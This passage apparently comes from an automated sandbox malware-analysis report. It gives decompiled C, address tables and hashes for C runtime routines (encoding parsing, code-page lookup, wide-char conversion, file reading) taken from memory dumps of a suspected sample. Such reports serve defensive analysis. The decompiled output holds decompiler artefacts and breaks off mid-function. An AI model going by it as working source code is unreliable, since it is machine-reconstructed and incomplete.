                                                          • RTL: Re-Waiting, xrefs: 00A62328
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.984109714.00000000009F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009E0000, based on PE: true
                                                          • Associated: 00000006.00000002.984102532.00000000009E0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000006.00000002.984259252.0000000000AD0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000006.00000002.984268876.0000000000AE0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000006.00000002.984275697.0000000000AE4000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000006.00000002.984283870.0000000000AE7000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000006.00000002.984289521.0000000000AF0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000006.00000002.984326505.0000000000B50000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_9e0000_dvukljmnr.jbxd
                                                          Similarity
                                                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                          • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                          • API String ID: 885266447-871070163
                                                          • Opcode ID: d91f380c0cdfbacbffa5edbed0ea93acac1753b2b53054029ee1762f9ff3e026
                                                          • Instruction ID: 7d1571415ac6767f3a22ae583c004702df8c3d617255b4f76b8782008896cab5
                                                          • Opcode Fuzzy Hash: d91f380c0cdfbacbffa5edbed0ea93acac1753b2b53054029ee1762f9ff3e026
                                                          • Instruction Fuzzy Hash: 36511772A00A156BDF11DB38DC91FA673A8BF98364F104229FD15DF281EA71ED418B90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 009A696E Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 94COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 99%
                                                          			E009A696E(signed int __eax, signed int __ebx, void* __ecx, void* __edx, signed int __edi, signed int __esi) {
				signed int _t34;
				signed short _t35;
				void* _t37;
				intOrPtr* _t41;
				void* _t44;
				void* _t45;
				void* _t46;
				void* _t47;
				void* _t48;
				void* _t49;
				void* _t50;
				void* _t51;
				void* _t52;
				void* _t53;
				void* _t54;
				void* _t55;
				signed int _t56;
				void* _t59;
				void* _t62;
				signed int _t63;
				signed int _t66;
				intOrPtr* _t68;
				void* _t69;
				void* _t71;
				void* _t74;
				intOrPtr _t75;

				_t66 = __esi;
				_t63 = __edi;
				_t62 = __edx;
				_t59 = __ecx;
				_t56 = __ebx;
				_t34 = __eax;
				while(1) {
					asm("rol byte [ebx-0x70f0ac08], 0x8a");
					 *_t34 =  *_t34 + _t34;
					_t1 = _t66 + _t66 * 2 - 0x7d;
					 *_t1 =  *((intOrPtr*)(_t66 + _t66 * 2 - 0x7d)) + _t62;
					_t75 =  *_t1;
					if(_t75 == 0) {
						if( *((intOrPtr*)(_t69 - 4)) != 0) {
							goto L37;
						} else {
							 *((intOrPtr*)(_t69 - 4)) = 1;
							_t56 = _t56 | 0x00000020;
						}
						goto L39;
					} else {
						_t50 = _t34 - 0x20;
						if(_t50 == 0) {
							L39:
							_t66 = _t66 + 2;
							_t35 =  *_t66 & 0x0000ffff;
							if(_t35 != 0) {
								if(_t59 == 0) {
									goto L40;
								} else {
									_t34 = _t35 & 0x0000ffff;
									continue;
								}
							} else {
								L40:
								if( *((intOrPtr*)(_t69 - 8)) == 0) {
									L56:
									_t37 = 0x20;
									while( *_t66 == _t37) {
										_t66 = _t66 + 2;
									}
									if( *_t66 != 0) {
										goto L1;
									} else {
										if(E009B2D65(_t69 + 0xc,  *((intOrPtr*)(_t69 + 8)), _t56,  *((intOrPtr*)(_t69 + 0x10)), 0x180) != 0) {
											goto L2;
										} else {
											_t41 =  *((intOrPtr*)(_t69 + 0x14));
											 *0x9cf1ec =  *0x9cf1ec + 1;
											 *((intOrPtr*)(_t41 + 4)) = 0;
											 *_t41 = 0;
											 *((intOrPtr*)(_t41 + 8)) = 0;
											 *((intOrPtr*)(_t41 + 0x1c)) = 0;
											 *(_t41 + 0xc) = _t63;
											 *((intOrPtr*)(_t41 + 0x10)) =  *((intOrPtr*)(_t69 + 0xc));
										}
									}
								} else {
									_t44 = 0x20;
									while( *_t66 == _t44) {
										_t66 = _t66 + 2;
									}
									_t45 = E009B2D83("ccs", _t66, 3);
									_t74 = _t71 + 0xc;
									if(_t45 != 0) {
										goto L1;
									} else {
										_t68 = _t66 + 6;
										_t46 = 0x20;
										while( *_t68 == _t46) {
											_t68 = _t68 + 2;
										}
										if( *_t68 != 0x3d) {
											goto L1;
										} else {
											do {
												_t68 = _t68 + 2;
											} while ( *_t68 == _t46);
											_t47 = E009B2E52(_t56, _t59, _t68, _t68, L"UTF-8", 5);
											_t71 = _t74 + 0xc;
											if(_t47 != 0) {
												_t48 = E009B2E52(_t56, _t59, _t68, _t68, L"UTF-16LE", 8);
												_t71 = _t71 + 0xc;
												if(_t48 != 0) {
													_t49 = E009B2E52(_t56, _t59, _t68, _t68, L"UNICODE", 7);
													_t71 = _t71 + 0xc;
													if(_t49 != 0) {
														goto L1;
													} else {
														_t66 = _t68 + 0xe;
														_t56 = _t56 | 0x00010000;
														goto L56;
													}
												} else {
													_t66 = _t68 + 0x10;
													_t56 = _t56 | 0x00020000;
													goto L56;
												}
											} else {
												_t66 = _t68 + 0xa;
												_t56 = _t56 | 0x00040000;
												goto L56;
											}
										}
									}
								}
							}
						} else {
							_t51 = _t50 - 0xb;
							if(_t51 == 0) {
								if((_t56 & 0x00000002) != 0) {
									goto L37;
								} else {
									_t56 = _t56 & 0xfffffffe | 0x00000002;
									_t63 = _t63 & 0xfffffffc | 0x00000080;
								}
								goto L39;
							} else {
								_t52 = _t51 - 1;
								if(_t52 == 0) {
									 *((intOrPtr*)(_t69 - 8)) = 1;
									goto L37;
								} else {
									_t53 = _t52 - 0x18;
									if(_t53 == 0) {
										if((_t56 & 0x00000040) != 0) {
											goto L37;
										} else {
											_t56 = _t56 | 0x00000040;
										}
										goto L39;
									} else {
										_t54 = _t53 - 0xa;
										if(_t54 == 0) {
											_t56 = _t56 | 0x00000080;
											goto L39;
										} else {
											_t55 = _t54 - 4;
											if(_t55 != 0) {
												L1:
												 *((intOrPtr*)(E009AF100())) = 0x16;
												E009AEB1E();
												L2:
												_t41 = 0;
											} else {
												if( *((intOrPtr*)(_t69 - 4)) != _t55) {
													L37:
													_t59 = 0;
												} else {
													 *((intOrPtr*)(_t69 - 4)) = 1;
													_t56 = _t56 | 0x00000010;
												}
												goto L39;
											}
										}
									}
								}
							}
						}
					}
					L62:
					return _t41;
					__eax = __eax - 0x54;
					if(__eax == 0) {
						__eax =  *(__ebp + 0xc);
						if((__eax & __ebx) == 0) {
							__ebx = __ebx | __eax;
						} else {
							goto L37;
						}
						goto L39;
					} else {
						__eax = __eax - 0xe;
						if(__eax == 0) {
							if((__ebx & 0x0000c000) != 0) {
								goto L37;
							} else {
								__ebx = __ebx | 0x00008000;
							}
							goto L39;
						} else {
							__eax = __eax - 1;
							if(__eax == 0) {
								if(__edx != 0) {
									goto L37;
								} else {
									__edx = __edx + 1;
									__edi = __edi | 0x00004000;
								}
								goto L39;
							} else {
								__eax = __eax - 0xb;
								if(__eax == 0) {
									if(__edx != 0) {
										goto L37;
									} else {
										__edx = __edx + 1;
										__edi = __edi & 0xffffbfff;
									}
									goto L39;
								} else {
									__eax = __eax - 6;
									if(__eax != 0) {
										goto L1;
									} else {
										if((__ebx & 0x0000c000) != 0) {
											goto L37;
										} else {
											__ebx = __ebx | 0x00004000;
										}
										goto L39;
									}
								}
							}
						}
					}
					goto L62;
				}
			}





























                                                          0x009a696e
                                                          0x009a696e
                                                          0x009a696e
                                                          0x009a696e
                                                          0x009a696e
                                                          0x009a696e
                                                          0x009aeeb8
                                                          0x009aeeb8
                                                          0x009aeebf
                                                          0x009aeec1
                                                          0x009aeec1
                                                          0x009aeec1
                                                          0x009aeec2
                                                          0x009aef3e
                                                          0x00000000
                                                          0x009aef40
                                                          0x009aef40
                                                          0x009aef47
                                                          0x009aef47
                                                          0x00000000
                                                          0x009aeec4
                                                          0x009aeec4
                                                          0x009aeec7
                                                          0x009aefae
                                                          0x009aefae
                                                          0x009aefb1
                                                          0x009aefb7
                                                          0x009aeeb0
                                                          0x00000000
                                                          0x009aeeb6
                                                          0x009aeeb6
                                                          0x00000000
                                                          0x009aeeb6
                                                          0x009aefbd
                                                          0x009aefbd
                                                          0x009aefc2
                                                          0x009af06e
                                                          0x009af070
                                                          0x009af076
                                                          0x009af073
                                                          0x009af073
                                                          0x009af080
                                                          0x00000000
                                                          0x009af086
                                                          0x009af0a0
                                                          0x00000000
                                                          0x009af0a6
                                                          0x009af0a6
                                                          0x009af0a9
                                                          0x009af0b1
                                                          0x009af0b4
                                                          0x009af0b6
                                                          0x009af0b9
                                                          0x009af0bf
                                                          0x009af0c2
                                                          0x009af0c2
                                                          0x009af0a0
                                                          0x009aefc8
                                                          0x009aefca
                                                          0x009aefd0
                                                          0x009aefcd
                                                          0x009aefcd
                                                          0x009aefdd
                                                          0x009aefe2
                                                          0x009aefe7
                                                          0x00000000
                                                          0x009aefed
                                                          0x009aefef
                                                          0x009aeff2
                                                          0x009aeff8
                                                          0x009aeff5
                                                          0x009aeff5
                                                          0x009af001
                                                          0x00000000
                                                          0x009af007
                                                          0x009af007
                                                          0x009af007
                                                          0x009af00a
                                                          0x009af017
                                                          0x009af01c
                                                          0x009af021
                                                          0x009af036
                                                          0x009af03b
                                                          0x009af040
                                                          0x009af055
                                                          0x009af05a
                                                          0x009af05f
                                                          0x00000000
                                                          0x009af065
                                                          0x009af065
                                                          0x009af068
                                                          0x00000000
                                                          0x009af068
                                                          0x009af042
                                                          0x009af042
                                                          0x009af045
                                                          0x00000000
                                                          0x009af045
                                                          0x009af023
                                                          0x009af023
                                                          0x009af026
                                                          0x00000000
                                                          0x009af026
                                                          0x009af021
                                                          0x009af001
                                                          0x009aefe7
                                                          0x009aefc2
                                                          0x009aeecd
                                                          0x009aeecd
                                                          0x009aeed0
                                                          0x009aef27
                                                          0x00000000
                                                          0x009aef29
                                                          0x009aef2f
                                                          0x009aef32
                                                          0x009aef32
                                                          0x00000000
                                                          0x009aeed2
                                                          0x009aeed2
                                                          0x009aeed3
                                                          0x009aef18
                                                          0x00000000
                                                          0x009aeed5
                                                          0x009aeed5
                                                          0x009aeed8
                                                          0x009aef0a
                                                          0x00000000
                                                          0x009aef10
                                                          0x009aef10
                                                          0x009aef10
                                                          0x00000000
                                                          0x009aeeda
                                                          0x009aeeda
                                                          0x009aeedd
                                                          0x009aeefc
                                                          0x00000000
                                                          0x009aeedf
                                                          0x009aeedf
                                                          0x009aeee2
                                                          0x009aee68
                                                          0x009aee6d
                                                          0x009aee73
                                                          0x009aee78
                                                          0x009aee78
                                                          0x009aeee4
                                                          0x009aeee7
                                                          0x009aefa8
                                                          0x009aefa8
                                                          0x009aeeed
                                                          0x009aeeed
                                                          0x009aeef4
                                                          0x009aeef4
                                                          0x00000000
                                                          0x009aeee7
                                                          0x009aeee2
                                                          0x009aeedd
                                                          0x009aeed8
                                                          0x009aeed3
                                                          0x009aeed0
                                                          0x009aeec7
                                                          0x009af0c5
                                                          0x009af0cb
                                                          0x009aef4c
                                                          0x009aef4f
                                                          0x009aefa1
                                                          0x009aefa6
                                                          0x009aefac
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x009aef51
                                                          0x009aef51
                                                          0x009aef54
                                                          0x009aef97
                                                          0x00000000
                                                          0x009aef99
                                                          0x009aef99
                                                          0x009aef99
                                                          0x00000000
                                                          0x009aef56
                                                          0x009aef56
                                                          0x009aef57
                                                          0x009aef86
                                                          0x00000000
                                                          0x009aef88
                                                          0x009aef88
                                                          0x009aef89
                                                          0x009aef89
                                                          0x00000000
                                                          0x009aef59
                                                          0x009aef59
                                                          0x009aef5c
                                                          0x009aef79
                                                          0x00000000
                                                          0x009aef7b
                                                          0x009aef7b
                                                          0x009aef7c
                                                          0x009aef7c
                                                          0x00000000
                                                          0x009aef5e
                                                          0x009aef5e
                                                          0x009aef61
                                                          0x00000000
                                                          0x009aef67
                                                          0x009aef6d
                                                          0x00000000
                                                          0x009aef6f
                                                          0x009aef6f
                                                          0x009aef6f
                                                          0x00000000
                                                          0x009aef6d
                                                          0x009aef61
                                                          0x009aef5c
                                                          0x009aef57
                                                          0x009aef54
                                                          0x00000000
                                                          0x009aef4f

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.984061455.00000000009A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009A0000, based on PE: true
                                                          • Associated: 00000006.00000002.984056146.00000000009A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000006.00000002.984081506.00000000009C7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000006.00000002.984089779.00000000009CE000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000006.00000002.984095965.00000000009D2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_9a0000_dvukljmnr.jbxd
                                                          Similarity
                                                          • API ID: __wcsnicmp$__sopen_s
                                                          • String ID: UTF-8$ccs
                                                          • API String ID: 857951187-3758431669
                                                          • Opcode ID: db2f554435ca04a75f020ee2e4c4606d0048b18236ed2baf28174d5f5dd925d2
                                                          • Instruction ID: 4b2e69dc4f78fac0a1503b9ee42290595fd844123da3f70e22aeeef58802cad3
                                                          • Opcode Fuzzy Hash: db2f554435ca04a75f020ee2e4c4606d0048b18236ed2baf28174d5f5dd925d2
                                                          • Instruction Fuzzy Hash: 0031F772D043529EEB305F649C04A697BA8DB17354F24886FE845DB1C2E670CD80C7E5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 009BE04E Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 60COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          C-Code - Quality: 92%
                                                          			E009BE04E(void* __eax, void* __edx, char _a4, intOrPtr _a8) {
				intOrPtr _t15;
				short* _t30;

				_t30 = _a4;
				if(_t30 != 0 &&  *_t30 != 0) {
					_push("ACP");
					 *((intOrPtr*)(_t30 - 0x18)) =  *((intOrPtr*)(_t30 - 0x18)) + __edx;
					if(__eax != 0) {
						if(E009BDB28(0x59fffffa, ?str?) != 0) {
							return E009BEFC5(0x59fffffa);
						}
						if(E009B9FDB(_a8 + 0x250, 0x2000000b,  &_a4, 2) == 0) {
							L10:
							return 0;
						}
						return _a4;
					}
				}
				if(E009B9FDB(_a8 + 0x250, 0x20001004,  &_a4, 2) == 0) {
					goto L10;
				}
				_t15 = _a4;
				if(_t15 == 0) {
					return GetACP();
				}
				return _t15;
			}





                                                          0x009be052
                                                          0x009be057
                                                          0x009be05f
                                                          0x009be063
                                                          0x009be06e
                                                          0x009be07f
                                                          0x00000000
                                                          0x009be0ad
                                                          0x009be09f
                                                          0x009be0d0
                                                          0x00000000
                                                          0x009be0d0
                                                          0x00000000
                                                          0x009be0a1
                                                          0x009be06e
                                                          0x009be0ce
                                                          0x00000000
                                                          0x00000000
                                                          0x009be0d4
                                                          0x009be0d9
                                                          0x009be0dd
                                                          0x009be0dd
                                                          0x009be0a6

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.984061455.00000000009A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009A0000, based on PE: true
                                                          • Associated: 00000006.00000002.984056146.00000000009A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000006.00000002.984081506.00000000009C7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000006.00000002.984089779.00000000009CE000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000006.00000002.984095965.00000000009D2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_9a0000_dvukljmnr.jbxd
                                                          Similarity
                                                          • API ID: _wcscmp
                                                          • String ID: ACP$OCP
                                                          • API String ID: 856254489-711371036
                                                          • Opcode ID: 1bd8d42fc78afc2a7e66b8cab0d6eb7bf1db64b1f89264cb01edb1aacc4353b3
                                                          • Instruction ID: 68469801770710b5232a3fc01aca10e9955a910c6a7855087d04a112b364d74a
                                                          • Opcode Fuzzy Hash: 1bd8d42fc78afc2a7e66b8cab0d6eb7bf1db64b1f89264cb01edb1aacc4353b3
                                                          • Instruction Fuzzy Hash: C401D83664921DBAEB24BA68DE42FE6339CDF40375F048815FE08D6181F7B4D94083D6
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 009BA436 Relevance: 6.1, APIs: 4, Instructions: 97COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E009BA436(short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v8;
				intOrPtr _v12;
				signed int _v20;
				signed int _t35;
				int _t38;
				signed int _t41;
				int _t42;
				intOrPtr* _t44;
				int _t47;
				short* _t49;
				intOrPtr _t50;
				intOrPtr _t54;
				int _t55;
				signed int _t59;
				char* _t62;

				_t62 = _a8;
				if(_t62 == 0) {
					L5:
					return 0;
				}
				_t50 = _a12;
				if(_t50 == 0) {
					goto L5;
				}
				if( *_t62 != 0) {
					E009B2DB9( &_v20, _a16);
					_t35 = _v20;
					__eflags =  *(_t35 + 0xa8);
					if( *(_t35 + 0xa8) != 0) {
						_t38 = E009BA1C7( *_t62 & 0x000000ff,  &_v20);
						__eflags = _t38;
						if(_t38 == 0) {
							__eflags = _a4;
							_t41 = _v20;
							_t59 = 1;
							_t28 = _t41 + 4; // 0x840ffff8
							_t42 = MultiByteToWideChar( *_t28, 9, _t62, 1, _a4, 0 | _a4 != 0x00000000);
							__eflags = _t42;
							if(_t42 != 0) {
								L21:
								__eflags = _v8;
								if(_v8 != 0) {
									_t54 = _v12;
									_t31 = _t54 + 0x70;
									 *_t31 =  *(_t54 + 0x70) & 0xfffffffd;
									__eflags =  *_t31;
								}
								return _t59;
							}
							L20:
							_t44 = E009AF100();
							_t59 = _t59 | 0xffffffff;
							__eflags = _t59;
							 *_t44 = 0x2a;
							goto L21;
						}
						_t59 = _v20;
						__eflags =  *(_t59 + 0x74) - 1;
						if( *(_t59 + 0x74) <= 1) {
							L15:
							_t20 = _t59 + 0x74; // 0xe1c11fe1
							__eflags = _t50 -  *_t20;
							L16:
							if(__eflags < 0) {
								goto L20;
							}
							__eflags = _t62[1];
							if(_t62[1] == 0) {
								goto L20;
							}
							L18:
							_t22 = _t59 + 0x74; // 0xe1c11fe1
							_t59 =  *_t22;
							goto L21;
						}
						_t12 = _t59 + 0x74; // 0xe1c11fe1
						__eflags = _t50 -  *_t12;
						if(__eflags < 0) {
							goto L16;
						}
						__eflags = _a4;
						_t17 = _t59 + 0x74; // 0xe1c11fe1
						_t18 = _t59 + 4; // 0x840ffff8
						_t47 = MultiByteToWideChar( *_t18, 9, _t62,  *_t17, _a4, 0 | _a4 != 0x00000000);
						_t59 = _v20;
						__eflags = _t47;
						if(_t47 != 0) {
							goto L18;
						}
						goto L15;
					}
					_t55 = _a4;
					__eflags = _t55;
					if(_t55 != 0) {
						 *_t55 =  *_t62 & 0x000000ff;
					}
					_t59 = 1;
					goto L21;
				}
				_t49 = _a4;
				if(_t49 != 0) {
					 *_t49 = 0;
				}
				goto L5;
			}


















                                                          0x009ba43e
                                                          0x009ba443
                                                          0x009ba45d
                                                          0x00000000
                                                          0x009ba45d
                                                          0x009ba445
                                                          0x009ba44a
                                                          0x00000000
                                                          0x00000000
                                                          0x009ba44f
                                                          0x009ba46c
                                                          0x009ba471
                                                          0x009ba474
                                                          0x009ba47b
                                                          0x009ba49a
                                                          0x009ba4a1
                                                          0x009ba4a3
                                                          0x009ba4e7
                                                          0x009ba4f3
                                                          0x009ba4f6
                                                          0x009ba4fb
                                                          0x009ba4fe
                                                          0x009ba504
                                                          0x009ba506
                                                          0x009ba516
                                                          0x009ba516
                                                          0x009ba51a
                                                          0x009ba51c
                                                          0x009ba51f
                                                          0x009ba51f
                                                          0x009ba51f
                                                          0x009ba51f
                                                          0x00000000
                                                          0x009ba525
                                                          0x009ba508
                                                          0x009ba508
                                                          0x009ba50d
                                                          0x009ba50d
                                                          0x009ba510
                                                          0x00000000
                                                          0x009ba510
                                                          0x009ba4a5
                                                          0x009ba4a8
                                                          0x009ba4ac
                                                          0x009ba4d5
                                                          0x009ba4d5
                                                          0x009ba4d5
                                                          0x009ba4d8
                                                          0x009ba4d8
                                                          0x00000000
                                                          0x00000000
                                                          0x009ba4da
                                                          0x009ba4de
                                                          0x00000000
                                                          0x00000000
                                                          0x009ba4e0
                                                          0x009ba4e0
                                                          0x009ba4e0
                                                          0x00000000
                                                          0x009ba4e0
                                                          0x009ba4ae
                                                          0x009ba4ae
                                                          0x009ba4b1
                                                          0x00000000
                                                          0x00000000
                                                          0x009ba4b5
                                                          0x009ba4bf
                                                          0x009ba4c5
                                                          0x009ba4c8
                                                          0x009ba4ce
                                                          0x009ba4d1
                                                          0x009ba4d3
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x009ba4d3
                                                          0x009ba47d
                                                          0x009ba480
                                                          0x009ba482
                                                          0x009ba487
                                                          0x009ba487
                                                          0x009ba48c
                                                          0x00000000
                                                          0x009ba48c
                                                          0x009ba451
                                                          0x009ba456
                                                          0x009ba45a
                                                          0x009ba45a
                                                          0x00000000

                                                          APIs
                                                          • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 009BA46C
                                                          • __isleadbyte_l.LIBCMT ref: 009BA49A
                                                          • MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,E1C11FE1,00BFBBEF,00000000), ref: 009BA4C8
                                                          • MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,00000001,00BFBBEF,00000000), ref: 009BA4FE
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.984061455.00000000009A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009A0000, based on PE: true
                                                          • Associated: 00000006.00000002.984056146.00000000009A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000006.00000002.984081506.00000000009C7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000006.00000002.984089779.00000000009CE000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000006.00000002.984095965.00000000009D2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_9a0000_dvukljmnr.jbxd
                                                          Similarity
                                                          • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                          • String ID:
                                                          • API String ID: 3058430110-0
                                                          • Opcode ID: ad6b76abea79014822cc53aa1520ab27422f7bd74aba9f43af4f3402a73188c8
                                                          • Instruction ID: 8f52befa4c2e748f79f95a784e2a1c2d106a4ad648a4af1624d9444e3cbe01d4
                                                          • Opcode Fuzzy Hash: ad6b76abea79014822cc53aa1520ab27422f7bd74aba9f43af4f3402a73188c8
                                                          • Instruction Fuzzy Hash: 3131CF30604246AFDB218F65CE48BFA7BAAFF41330F158529F865871A0E7B0D950DB92
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 009A46C9 Relevance: 6.1, APIs: 4, Instructions: 89COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 68%
                                                          			E009A46C9(void* __eax, void* __ebx, intOrPtr* __ecx, void* __edi) {
				void* _t47;
				intOrPtr _t48;
				intOrPtr* _t49;
				void* _t64;
				void* _t65;
				signed int _t66;
				signed int _t68;
				signed int _t74;
				void* _t76;
				void* _t77;
				intOrPtr _t78;
				void* _t79;
				signed int _t80;

				_t64 = __ebx;
				asm("rol byte [eax-0x77], 0x41");
				_t76 = __edi - 1;
				_t74 =  *(_t80 - 0x2bc);
				 *__ecx =  *((intOrPtr*)(_t76 + 4));
				 *((intOrPtr*)(_t76 + 0x70)) =  *((intOrPtr*)(__ecx + 4));
				_t47 =  *((intOrPtr*)(0x9c84f8 + _t74 * 0xc))();
				_t48 =  *((intOrPtr*)(_t80 - 0x2dc));
				_t68 = _t76;
				if(_t47 == 0) {
					if(_t48 != 0x9ce694) {
						asm("lock xadd [eax], ecx");
						if((_t68 | 0xffffffff) == 0) {
							E009B2248( *((intOrPtr*)(__ebx + _t76 + 0x1c)));
							E009B2248( *((intOrPtr*)(__ebx + _t76 + 0x18)));
							E009B2248( *((intOrPtr*)(_t76 + 0xa0 +  *(_t80 - 0x2bc) * 4)));
							 *((intOrPtr*)(__ebx + _t76 + 0x14)) = _t78;
							 *((intOrPtr*)(_t76 + 0xa0 +  *(_t80 - 0x2bc) * 4)) = _t78;
						}
					}
					_t49 =  *((intOrPtr*)(_t80 - 0x2e0));
					 *_t49 = 1;
					 *((intOrPtr*)(_t64 + _t76 + 0x1c)) = _t49;
				} else {
					 *((intOrPtr*)(__ebx + _t76 + 0x14)) = _t48;
					_t66 =  *(_t80 - 0x2bc);
					E009B2248( *((intOrPtr*)(_t76 + 0xa0 + _t66 * 4)));
					 *((intOrPtr*)(_t76 + 0xa0 + _t66 * 4)) =  *((intOrPtr*)(_t80 - 0x2e8));
					E009B2248( *((intOrPtr*)(_t80 - 0x2e0)));
					 *((intOrPtr*)(_t76 + 4)) =  *((intOrPtr*)(_t80 - 0x2e4));
				}
				_pop(_t77);
				_pop(_t79);
				_pop(_t65);
				return E009B1E0D(_t65,  *(_t80 - 4) ^ _t80, _t74, _t77, _t79);
			}
















                                                          0x009a46c9
                                                          0x009b825f
                                                          0x009b8265
                                                          0x009b82b8
                                                          0x009b82be
                                                          0x009b82c3
                                                          0x009b82ea
                                                          0x009b82f2
                                                          0x009b82f8
                                                          0x009b82f9
                                                          0x009b833f
                                                          0x009b8348
                                                          0x009b834c
                                                          0x009b8352
                                                          0x009b835b
                                                          0x009b836d
                                                          0x009b837b
                                                          0x009b837f
                                                          0x009b837f
                                                          0x009b834c
                                                          0x009b8386
                                                          0x009b838c
                                                          0x009b8392
                                                          0x009b82fb
                                                          0x009b82fb
                                                          0x009b82ff
                                                          0x009b830c
                                                          0x009b8317
                                                          0x009b8325
                                                          0x009b8332
                                                          0x009b805a
                                                          0x009b805f
                                                          0x009b8060
                                                          0x009b8063
                                                          0x009b806c

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.984061455.00000000009A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009A0000, based on PE: true
                                                          • Associated: 00000006.00000002.984056146.00000000009A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000006.00000002.984081506.00000000009C7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000006.00000002.984089779.00000000009CE000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000006.00000002.984095965.00000000009D2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_9a0000_dvukljmnr.jbxd
                                                          Similarity
                                                          • API ID: _free$StringType___crt_memcmp
                                                          • String ID:
                                                          • API String ID: 1184073126-0
                                                          • Opcode ID: d41675ac05ddc7bc1163e82c46b9af16f65fd599d73b3b4ebe38d66d826a3d90
                                                          • Instruction ID: 98e7d9b28e4212d626c4dff7457ae6ebe5ec8b29fa03140aa2a72fdd2b263a15
                                                          • Opcode Fuzzy Hash: d41675ac05ddc7bc1163e82c46b9af16f65fd599d73b3b4ebe38d66d826a3d90
                                                          • Instruction Fuzzy Hash: DD317E70A0221A9FCB10DF28CA84BE9B7B8FB09314F2045E9E519D7252DB319D92CF50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 009A6233 Relevance: 6.1, APIs: 4, Instructions: 84fileCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 56%
                                                          			E009A6233(signed int __ebx, void* __ecx, signed int __edx, signed int __edi, signed int __esi) {
				void* _t80;
				signed char _t81;
				char* _t83;
				signed int _t84;
				signed char _t86;
				signed int _t87;
				signed int _t89;
				long _t97;
				signed int _t102;
				char _t103;
				char _t104;
				signed int _t106;
				signed int _t110;
				void* _t111;
				void* _t114;
				void* _t115;
				void* _t116;
				signed int _t119;
				signed int _t120;
				char* _t122;
				void* _t123;
				intOrPtr _t124;
				intOrPtr _t126;
				signed int _t133;
				signed int _t136;
				signed int _t138;
				signed int _t140;
				char* _t142;
				signed int _t143;
				signed char* _t145;
				int _t146;
				signed int _t147;
				void* _t148;
				void* _t150;
				void* _t163;

				_t143 = __esi;
				_t138 = __edi;
				_t133 = __edx;
				_t123 = __ecx;
				_t119 = __ebx;
				while(1) {
					L13:
					 *((intOrPtr*)(_t148 - 0x74af00bb)) =  *((intOrPtr*)(_t148 - 0x74af00bb)) + _t123;
					asm("pushfd");
					_t119 = _t119 + _t119;
					if(ReadFile(??, ??, ??, ??, ??) != 0 || GetLastError() == 0) {
						goto L15;
					}
					L30:
					_t133 =  *(_t148 - 0xc);
					_t123 = 0xd;
					 *_t143 = _t123;
					_t143 = _t143 + 1;
					L25:
					while(_t138 <  *((intOrPtr*)(_t148 - 0x1c))) {
						_t80 =  *_t138;
						__eflags = _t80 - 0x1a;
						if(_t80 == 0x1a) {
